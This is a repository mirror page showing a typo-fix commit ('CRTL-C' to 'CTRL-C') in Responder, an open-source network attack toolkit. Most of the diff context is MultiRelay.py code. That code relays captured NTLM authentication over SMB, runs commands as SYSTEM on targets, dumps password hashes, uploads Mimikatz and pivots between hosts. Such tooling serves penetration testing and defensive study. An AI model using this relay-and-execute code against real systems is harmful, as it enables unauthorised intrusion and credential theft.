github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-08-14 02:27:12 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Fixed instances of "CRTL-C" to "CTRL-C"

Browse source
This commit is contained in:
Randy Ramos 2017-04-22 14:40:19 -04:00
commit 44a4e495cc
3 changed files with 40 additions and 40 deletions
Download patch file Download diff file Expand all files Collapse all files

2
tools/Icmp-Redirect.py
View file

@ -214,7 +214,7 @@ def IcmpRedirectSock(DestinationIP):
def FindWhatToDo(ToThisHost2): def FindWhatToDo(ToThisHost2):
if ToThisHost2 != None: if ToThisHost2 != None:
Show_Help('Hit CRTL-C to kill this script') Show_Help('Hit CTRL-C to kill this script')
RunThisInLoop(ToThisHost, ToThisHost2,OURIP) RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
if ToThisHost2 == None: if ToThisHost2 == None:
Show_Help(MoreHelp) Show_Help(MoreHelp)

76
tools/MultiRelay.py
View file

@ -1,5 +1,5 @@
#!/usr/bin/env python #!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools # This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie. # created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com # email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify # This program is free software: you can redistribute it and/or modify
@ -33,7 +33,7 @@ except ImportError:
try: try:
import readline import readline
except: except:
print "Warning: readline module is not available, you will not be able to use the arrow keys for command history" print "Warning: readline module is not available, you will not be able to use the arrow keys for command history"
pass pass
from MultiRelay.RelayMultiPackets import * from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import * from MultiRelay.RelayMultiCore import *
@ -104,7 +104,7 @@ def ShowWelcome():
print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1) print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1)
print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com' print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com'
print 'Usernames to relay (-u) are case sensitive.' print 'Usernames to relay (-u) are case sensitive.'
print 'To kill this script hit CRTL-C.\n' print 'To kill this script hit CTRL-C.\n'
print color('/*',8,1) print color('/*',8,1)
print 'Use this script in combination with Responder.py for best results.' print 'Use this script in combination with Responder.py for best results.'
print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n' print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n'
@ -136,7 +136,7 @@ def ShowHelp():
print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)' print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)'
print color('help',8,1)+' -> Print this message.' print color('help',8,1)+' -> Print this message.'
print color('exit',8,1)+' -> Exit this shell and return in relay mode.' print color('exit',8,1)+' -> Exit this shell and return in relay mode.'
print ' If you want to quit type exit and then use CRTL-C\n' print ' If you want to quit type exit and then use CTRL-C\n'
print color('Any other command than that will be run as SYSTEM on the target.\n',8,1) print color('Any other command than that will be run as SYSTEM on the target.\n',8,1)
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../" Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
@ -185,7 +185,7 @@ def IsPivotOn():
def ConnectToTarget(): def ConnectToTarget():
try: try:
s = socket(AF_INET, SOCK_STREAM) s = socket(AF_INET, SOCK_STREAM)
s.connect((Host[0],445)) s.connect((Host[0],445))
return s return s
except: except:
try: try:
@ -195,7 +195,7 @@ def ConnectToTarget():
pass pass
class HTTPProxyRelay(BaseRequestHandler): class HTTPProxyRelay(BaseRequestHandler):
def handle(self): def handle(self):
try: try:
@ -236,12 +236,12 @@ class HTTPProxyRelay(BaseRequestHandler):
if smbdata[8:10] == "\x72\x00": if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00") head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) #got it here. smbdata = s.recv(2048) #got it here.
## Send HTTP Proxy ## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans() Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
@ -291,7 +291,7 @@ class HTTPProxyRelay(BaseRequestHandler):
class HTTPRelay(BaseRequestHandler): class HTTPRelay(BaseRequestHandler):
def handle(self): def handle(self):
try: try:
@ -333,12 +333,12 @@ class HTTPRelay(BaseRequestHandler):
if smbdata[8:10] == "\x72\x00": if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00") head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) #got it here. smbdata = s.recv(2048) #got it here.
## Send HTTP Response. ## Send HTTP Response.
Buffer_Ans = IIS_NTLM_Challenge_Ans() Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
@ -366,7 +366,7 @@ class HTTPRelay(BaseRequestHandler):
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay. t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent." print "[+] SMB Session Auth sent."
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) smbdata = s.recv(2048)
@ -388,7 +388,7 @@ class HTTPRelay(BaseRequestHandler):
pass pass
class SMBRelay(BaseRequestHandler): class SMBRelay(BaseRequestHandler):
def handle(self): def handle(self):
try: try:
@ -462,14 +462,14 @@ class SMBRelay(BaseRequestHandler):
#We're all set, dropping into shell. #We're all set, dropping into shell.
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user. #If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account. #This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account. #Let's kill that connection so we can force him to reauth with another account.
if RunCmd is None: if RunCmd is None:
s.close() s.close()
return None return None
else: else:
##Send logon failure, so our client might authenticate with another account. ##Send logon failure, so our client might authenticate with another account.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty() t = SMBSessEmpty()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
@ -516,15 +516,15 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del ShellOpen[:] del ShellOpen[:]
return False return False
## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$: ## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$:
## Tree Connect ## Tree Connect
if data[8:10] == "\x73\x00": if data[8:10] == "\x73\x00":
GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session. GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$") t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$")
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
@ -538,7 +538,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del ShellOpen[:] del ShellOpen[:]
return False return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case.. # This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
if data[8:10] == "\x75\xcc": if data[8:10] == "\x75\xcc":
print "[+] Tree Connect AndX denied. Bad Network Name returned." print "[+] Tree Connect AndX denied. Bad Network Name returned."
del ShellOpen[:] del ShellOpen[:]
@ -552,9 +552,9 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
print "[+] Looks good, "+Username+" has admin rights on C$." print "[+] Looks good, "+Username+" has admin rights on C$."
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$") t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
@ -588,7 +588,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
t.daemon = True t.daemon = True
t.start() t.start()
#Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation #Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation
#to maintain MultiRelay alive and well. #to maintain MultiRelay alive and well.
count = 0 count = 0
DoEvery = random.randint(10, 45) DoEvery = random.randint(10, 45)
@ -622,8 +622,8 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del ShellOpen[:] del ShellOpen[:]
return None return None
##For all of the following commands we send the data (var: data) returned by the ##For all of the following commands we send the data (var: data) returned by the
##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore. ##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore.
##We also clean up the command array when done. ##We also clean up the command array when done.
if DumpReg: if DumpReg:
data = DumpHashes(data, s, Target[0]) data = DumpHashes(data, s, Target[0])
@ -641,7 +641,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Upload: if Upload:
File = Upload[0] File = Upload[0]
if os.path.isfile(File): if os.path.isfile(File):
FileSize, FileContent = UploadContent(File) FileSize, FileContent = UploadContent(File)
File = os.path.basename(File) File = os.path.basename(File)
data = WriteFile(data, s, File, FileSize, FileContent, Target[0]) data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
@ -661,7 +661,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del Cmd[:] del Cmd[:]
if RunAs: if RunAs:
if os.path.isfile(RunAsFileName): if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName) FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName) FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -673,11 +673,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del Cmd[:] del Cmd[:]
if LCmd: if LCmd:
subprocess.call(LCmd[0], shell=True) subprocess.call(LCmd[0], shell=True)
del Cmd[:] del Cmd[:]
if Mimi: if Mimi:
if os.path.isfile(MimikatzFilename): if os.path.isfile(MimikatzFilename):
FileSize, FileContent = UploadContent(MimikatzFilename) FileSize, FileContent = UploadContent(MimikatzFilename)
FileName = os.path.basename(MimikatzFilename) FileName = os.path.basename(MimikatzFilename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -689,7 +689,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del Cmd[:] del Cmd[:]
if Mimi32: if Mimi32:
if os.path.isfile(Mimikatzx86Filename): if os.path.isfile(Mimikatzx86Filename):
FileSize, FileContent = UploadContent(Mimikatzx86Filename) FileSize, FileContent = UploadContent(Mimikatzx86Filename)
FileName = os.path.basename(Mimikatzx86Filename) FileName = os.path.basename(Mimikatzx86Filename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -710,7 +710,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del Pivot[:] del Pivot[:]
del Cmd[:] del Cmd[:]
else: else:
if os.path.isfile(RunAsFileName): if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName) FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName) FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -719,7 +719,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Status == True: if Status == True:
print "[+] Pivoting to %s."%(Pivot[0]) print "[+] Pivoting to %s."%(Pivot[0])
if os.path.isfile(RunAsFileName): if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName) FileSize, FileContent = UploadContent(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
#shell will close. #shell will close.
@ -754,7 +754,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
##Let go with the command. ##Let go with the command.
if any(x in Cmd for x in Cmd): if any(x in Cmd for x in Cmd):
if len(Cmd[0]) > 1: if len(Cmd[0]) > 1:
if os.path.isfile(SysSVCFileName): if os.path.isfile(SysSVCFileName):
FileSize, FileContent = UploadContent(SysSVCFileName) FileSize, FileContent = UploadContent(SysSVCFileName)
FileName = os.path.basename(SysSVCFileName) FileName = os.path.basename(SysSVCFileName)
RunPath = '%windir%\\Temp\\'+FileName RunPath = '%windir%\\Temp\\'+FileName
@ -768,12 +768,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if data is None: if data is None:
print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n" print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n"
if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop. if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")# t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")#
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
@ -788,7 +788,7 @@ def serve_thread_tcp(host, port, handler):
try: try:
server = ThreadingTCPServer((host, port), handler) server = ThreadingTCPServer((host, port), handler)
server.serve_forever() server.serve_forever()
except: except:
print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1) print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1)
def main(): def main():

2
utils.py
View file

@ -293,7 +293,7 @@ def banner():
print "\n \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__ print "\n \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__
print "" print ""
print " Author: Laurent Gaffie (laurent.gaffie@gmail.com)" print " Author: Laurent Gaffie (laurent.gaffie@gmail.com)"
print " To kill this script hit CRTL-C" print " To kill this script hit CTRL-C"
print "" print ""